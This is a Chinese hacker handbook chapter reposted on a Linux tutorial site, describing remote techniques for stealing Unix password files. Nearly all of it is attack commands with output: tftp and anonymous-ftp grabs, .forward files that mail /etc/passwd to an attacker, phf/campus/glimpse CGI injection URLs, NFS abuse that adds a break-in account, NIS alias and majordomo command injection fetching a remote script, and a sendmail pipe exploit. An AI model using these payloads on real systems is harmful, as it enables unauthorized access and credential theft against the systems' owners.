当前位置:Linux教程 - Linux - samsa 黑客手册(2)

samsa 黑客手册(2)



         作者[samsa]
    二、隔山打牛(远程攻击)
    1) 隔空取物:取得passwd
    1.1) tftp
    # tftp numen
    tftp> get /etc/passwd
    Error code 2: Access violation
    tftp> get /etc/shadow
    Error code 2: Access violation
    tftp> quit
    (samsa:一无所获,但是...)
    # tftp sun8
    tftp> get /etc/passwd
    Received 965 bytes in 0.1 seconds
    tftp> get /etc/shadow
    Error code 2: Access violation
    (samsa:成功了!!!;-)
    # cat passwd
    root:x:0:0:Super-User:/:/bin/ksh
    daemon:x:1:1::/:
    bin:x:2:2::/usr/bin:
    sys:x:3:3::/:/bin/sh
    adm:x:4:4:Admin:/var/adm:
    lp:x:71:8:Line Printer Admin:/usr/spool/lp:
    smtp:x:0:0:Mail Daemon User:/:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:Nobody:/:
    noaccess:x:60002:60002:No Access User:/:
    ylx:x:10007:10::/users/ylx:/bin/sh
    wzhou:x:10020:10::/users/wzhou:/bin/sh
    wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
    (samsa:可惜是shadow过了的:-/)
    1.2) 匿名ftp
    1.2.1) 直接获得
    # ftp sun8
    Connected to sun8.
    220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
    Name (sun8:root): anonymous
    331 Guest login ok, send ident as password.
    Password:
    (samsa:your e-mail address,当然,是假的:->)
    230 Guest login ok, access restrictions apply.
    ftp> ls
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
    bin
    dev
    etc
    incoming
    pub
    usr
    226 ASCII Transfer complete.
    35 bytes received in 0.85 seconds (0.04 Kbytes/s)
    ftp> cd etc
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
    group
    passwd
    226 ASCII Transfer complete.
    15 bytes received in 0.083 seconds (0.18 Kbytes/s)
    ftp> get passwd
    200 PORT command successful.
    150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
    226 ASCII Transfer complete.
    local: passwd remote: passwd
    231 bytes received in 0.038 seconds (5.98 Kbytes/s)
    # cat passwd
    root:x:0:0:Super-User:/:/bin/ksh
    daemon:x:1:1::/:
    bin:x:2:2::/usr/bin:
    sys:x:3:3::/:/bin/sh
    adm:x:4:4:Admin:/var/adm:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nobody:x:60001:60001:Nobody:/:
    ftp:x:210:12::/export/ftp:/bin/false
    (samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)
    1.2.2) ftp 主目录可写
    # cat forward_sucker_file
    "| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]"
    # ftp victim.com
    Connected to victim.com
    220 victim FTP server ready.
    Name (victim.com:zen): ftp
    331 Guest login ok, send ident as password.
    Password:[your e-mail address:forged]
    230 Guest login ok, access restrictions apply.
    ftp> put forward_sucker_file .forward
    43 bytes sent in 0.0015 seconds (28 Kbytes/s)
    ftp> quit
    # echo test | mail [email protected]
    (samsa:等着passwd文件随邮件来到吧...)
    1.3) WWW
    著名的cgi大bug
    1.3.1) phf
    http://silly.com/cgi-bin/nph-test-cgi?*
    http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
    1.3.2) campus
    http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
    1.3.3) glimpse
    http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
    addr\ (samsa:行太长,折了折,不要紧吧? ;-)
    1.4) nfs
    1.4.1) 如果把/etc共享出来,就不必说了
    1.4.2) 如果某用户的主目录共享出来
    # showmount -e numen
    export list for numen:
    /space/users/lpf sun9
    /space/users/zw (everyone)
    # mount -F nfs numen:/space/users/zw /mnt
    # cd /mnt
    # ls -ld .
    drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
    # echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
    # echo zw::::::::: >> /etc/shadow
    # su zw
    $ cat >.forward
    "| /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]"
    ^D
    # echo test | mail zw@numen
    (samsa:等着你的邮件吧....)
    1.5) sniffer
    利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
    关于sniffer的原理和技术细节,见[samsa 1999].
    (samsa:没什么意思,有种``胜之不武的感觉...)
    1.6) NIS
    1.6.1) 猜测域名,然后用ypcat(或对于NIS+:niscat)可获得passwd(甚至shadow)
    1.6.2) 若能控制NIS服务器,可创建邮件别名
    nis-master # echo foo: "| mail [email protected] < /etc/passwd " >> /etc/a
    lias
    s
    nis-master # cd /var/yp
    nis-master # make aliases
    nis-master # echo test | mail -v [email protected]
    1.7) e-mail
    e.g.利用majordomo(ver. 1.94.3)的漏洞
    Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp
    /script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-
    mail
    # cat script
    /bin/cat /etc/passwd|sed s/^/ /|/bin/mail [email protected]
    #
    1.8) sendmail
    利用sendmail 5.55的漏洞:
    # telnet victim.com 25
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com
    Escape character is ^].
    220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
    mail from: "|/bin/mail [email protected] < /etc/passwd"
    250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
    rcpt to: nosuchuser
    550 nosuchuser... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    ..
    250 Mail accepted
    quit
    Connection closed by foreign host.
    (samsa:wait...)

    发布人:netbull 来自:sinbad网络安全 

站点导航
赞助商链接